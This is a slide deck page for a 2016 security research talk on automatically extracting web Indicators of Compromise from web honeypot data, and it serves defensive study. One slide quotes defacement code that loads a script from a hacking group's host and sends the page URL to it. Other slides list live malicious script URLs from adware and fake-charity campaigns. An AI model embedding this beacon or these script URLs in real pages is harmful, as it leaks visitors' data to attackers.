Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Automatic Extraction of Indicators of
Compromise for Web Apps
Dr.-Ing. Marco Balduzzi
(with D. Balzarotti and O. Catakoglu...
2
Who am I?
Sr. Research Scientist @ Trend
Micro
Forward-Looking Threat Research (FTR)
team
M.Sc. + Ph.D.
UniBG + iSecLab@...
3
Indicators of Compromise (IOCs)
Used in incident response and computer forensics
Forensic artifacts
A system has been co...
4
Topic of presentation
Extend the concept of IOCs to Web Applications
(& automatically detect them!)
5
6
7
8
A simple observation
When compromising a web application, attackers often rely
on external content / accessory scripts
A...
9
BUT…
Their presence can be used to precisely pinpoint
compromised or harmful pages
(a Web Indicator of Compromise)
10
Example: r57 hacking group
...
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Ty...
11
Example: r57 hacking group
...
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Ty...
12
13
How do we know that a script is used
in a malicious context ?
i.e. “Is a valid IOC”
14
Data Collection
High-interaction web honeypot [1]
[1] Canali, D., and Balzarotti, D.
Behind the scenes of online attack...
15
Extraction of Candidates
Automatically extract candidates from files uploaded and
modified by attackers
Focus on JavaSc...
16
Searching the Web for Indicators
Public web pages including references to our
indicators
Google did not help :(
Only in...
17
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
18
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
Maliciousness
19
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
Maliciousness
...
20
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
Maliciousness
...
21
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
Maliciousness
...
22
Experiments
Training data: Jan 2015 → April 2015
375 unique candidates (over a total of 2,765)
Population of 1 to 202 (...
23
Live Experiment
303 unique candidates (2.5/day)
Automatically processed and assigned to the closed cluster
22 Benign in...
24
High Lifetime of Malicious Indicators
25
Use of trustworthy code-repositories
10% IOCs hosted on Google Drive/Code!
1 was online for over 2 years!
Last month: u...
26
Web Shells
Often deployed by attackers and hidden in
defaced websites
Cases of password-protected logins [1]
Flagged as...
27
Phishing
Common habit
Webmail portals of AOL and Yahoo
Reused the original JS files and hosted on the authoritative
dom...
28
VisAdd Adware Campaign
http://4x3zy4ql­l8bu4n1j.netdna­ssl.com/res/helper.min.js
Installed on defaced webpages
TDS for ...
29
Fake Charity Program
http://static.donation­tools.org/widgets/FoxyLyrics/widget.js
Loaded via BHO in IE
Vittalia and Br...
30
Mailers
Compromised sites [1] → SPAM mailing server
Alternative to BHS and botnet-infected machines
Use of Pro Mailer V...
31
Limitations
Our approach relies on the attacker's
deployment strategy and is content agnostic
Evasion techniques:
Inlin...
32
Conclusions
Introduced the concept of Web IOCs
Leveraged a honeypot for real-time identification
Benign content → undet...
33
Thank you!
Dr.-Ing. Marco Balduzzi
@embyte
Upcoming SlideShare
Loading in …5
×

Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

1,339 views

Published on

Indicators of Compromise (IOCs) are forensic artifacts that are used as signs that a system has been compromised by an attack or that it has been infected with a particular malicious software. In this paper we propose for the first time an automated technique to extract and validate IOCs for web applications, by analyzing the information collected by a high-interaction honeypot. Our approach has several advantages compared with traditional techniques used to detect malicious websites. First of all, not all the compromised web pages are malicious or harmful for the user. Some may be defaced to advertise product or services, and some may be part of affiliate programs to redirect users toward (more or less legitimate) online shopping websites. In any case, it is important to detect those pages to inform their owners and to alert the users on the fact that the content of the page has been compromised and cannot be trusted. Also in the case of more traditional drive-by-download pages, the use of IOCs allows for a prompt detection and correlation of infected pages, even before they may be blocked by more traditional URLs blacklists. Our experiments show that our system is able to automatically generate web indicators of compromise that have been used by attackers for several months (and sometimes years) in the wild without being detected. So far, these apparently harmless scripts were able to stay under the radar of the existing detection methodologies – resisting for long time on public web sites.

Published in: Internet
  • Be the first to comment

Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

  1. 1. Automatic Extraction of Indicators of Compromise for Web Apps Dr.-Ing. Marco Balduzzi (with D. Balzarotti and O. Catakoglu @ WWW'16) 29th April 2016 RuhrSec, Bochum
  2. 2. 2 Who am I? Sr. Research Scientist @ Trend Micro Forward-Looking Threat Research (FTR) team M.Sc. + Ph.D. UniBG + iSecLab@EURECOM Hackish and open-source enthusiast since 2002 Established presence in international conferences and committees
  3. 3. 3 Indicators of Compromise (IOCs) Used in incident response and computer forensics Forensic artifacts A system has been compromised or infected with malware For example Presence in Windows Registry MD5 file in temporary directory Unusual outbound network traffic Log-in irregularities and failures
  4. 4. 4 Topic of presentation Extend the concept of IOCs to Web Applications (& automatically detect them!)
  5. 5. 5
  6. 6. 6
  7. 7. 7
  8. 8. 8 A simple observation When compromising a web application, attackers often rely on external content / accessory scripts Are not necessarily per se malicious Popular Javascript libraries, e.g. jQuery Beautifiers that control the look&feel of the page, e.g. matrix-style background Scripts that implement reusable functions, e.g. browsers fingerprinting Their innocuous form make them “highly resilient” to traditional detection systems (scanners)
  9. 9. 9 BUT… Their presence can be used to precisely pinpoint compromised or harmful pages (a Web Indicator of Compromise)
  10. 10. 10 Example: r57 hacking group ... <head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>4Ri3 60ndr0n9 was here </title> <SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js> </SCRIPT> ...
  11. 11. 11 Example: r57 hacking group ... <head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>4Ri3 60ndr0n9 was here </title> <SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js ></SCRIPT> ... a=new/**/Image(); a.src='http://www.r57.gen.tr/r00t/yaz.php?a='+ escape(location.href);
  12. 12. 12
  13. 13. 13 How do we know that a script is used in a malicious context ? i.e. “Is a valid IOC”
  14. 14. 14 Data Collection High-interaction web honeypot [1] [1] Canali, D., and Balzarotti, D. Behind the scenes of online attacks: an analysis of exploitation behaviors on the web.
  15. 15. 15 Extraction of Candidates Automatically extract candidates from files uploaded and modified by attackers Focus on JavaScript URLs Can be applied to other resource types Normally benign! E.g., Blocking mouse right-click. Used by attackers to prevent page inspection Content agnostic (impossible to tell) Need to extend the analysis to the context
  16. 16. 16 Searching the Web for Indicators Public web pages including references to our indicators Google did not help :( Only indexes the content (intext:) Meanpath.com HTML/JS source-code support Coverage of 200 million websites
  17. 17. 17 Compromised vs. Benign Verify that a candidate URL is a valid Indicator Set of features: Page Similarity
  18. 18. 18 Compromised vs. Benign Verify that a candidate URL is a valid Indicator Set of features: Page Similarity Maliciousness
  19. 19. 19 Compromised vs. Benign Verify that a candidate URL is a valid Indicator Set of features: Page Similarity Maliciousness Anomalous Origin
  20. 20. 20 Compromised vs. Benign Verify that a candidate URL is a valid Indicator Set of features: Page Similarity Maliciousness Anomalous Origin Component Popularity
  21. 21. 21 Compromised vs. Benign Verify that a candidate URL is a valid Indicator Set of features: Page Similarity Maliciousness Anomalous Origin Component Popularity Security Forums
  22. 22. 22 Experiments Training data: Jan 2015 → April 2015 375 unique candidates (over a total of 2,765) Population of 1 to 202 (manual vs automated attacks) Clustering: unsupervised learning (k-means) Weka framework 3 cluster categories: malicious, benign, undecided Live experiment: May 2015 → August 2015 (4 months) Automated detection via analysis framework
  23. 23. 23 Live Experiment 303 unique candidates (2.5/day) Automatically processed and assigned to the closed cluster 22 Benign indicators 96 Malicious indicators 90% were previously unknown or misclassified ¼ IOCs → visual effects: moving text, snow 185 insufficient information (rare scripts)
  24. 24. 24 High Lifetime of Malicious Indicators
  25. 25. 25 Use of trustworthy code-repositories 10% IOCs hosted on Google Drive/Code! 1 was online for over 2 years! Last month: used in dozens of defaced websites and drive-by
  26. 26. 26 Web Shells Often deployed by attackers and hidden in defaced websites Cases of password-protected logins [1] Flagged as valid indicator Cases of the r57shell script: feedback of defaced domains [1] http://www.lionsclubmalviyanagar.com and http://www.wartisan.com
  27. 27. 27 Phishing Common habit Webmail portals of AOL and Yahoo Reused the original JS files and hosted on the authoritative domain [1] IOC included in pages hosted on different domains Websites compromised by the same group [2] Correctly classified as malicious indicator [1] http://sns­static.aolcdn.com/sns.v14r8/js/fs.js  [2] http://www.ucylojistik.com/ and http://fernandanunes.com/
  28. 28. 28 VisAdd Adware Campaign http://4x3zy4ql­l8bu4n1j.netdna­ssl.com/res/helper.min.js Installed on defaced webpages TDS for affiliate programs A.Visadd.com malware Loads the same JS at client-side 600+ new infected users per day
  29. 29. 29 Fake Charity Program http://static.donation­tools.org/widgets/FoxyLyrics/widget.js Loaded via BHO in IE Vittalia and BrowseFox malware 594 new infections per day
  30. 30. 30 Mailers Compromised sites [1] → SPAM mailing server Alternative to BHS and botnet-infected machines Use of Pro Mailer V2: PHP mailer Copies of jQuery hosted on Google and Tumblr Unmodified copies of popular libraries. Very likely classified as benign by traditional scanners Malicious use detected. [1] http://www.senzadistanza.it/ and http://www.hprgroup.biz/
  31. 31. 31 Limitations Our approach relies on the attacker's deployment strategy and is content agnostic Evasion techniques: Inline code One-time generated URLs
  32. 32. 32 Conclusions Introduced the concept of Web IOCs Leveraged a honeypot for real-time identification Benign content → undetected by traditional scanners Use 'HTTP Referer' to discover compromises pages By the same hacking group?
  33. 33. 33 Thank you! Dr.-Ing. Marco Balduzzi @embyte

×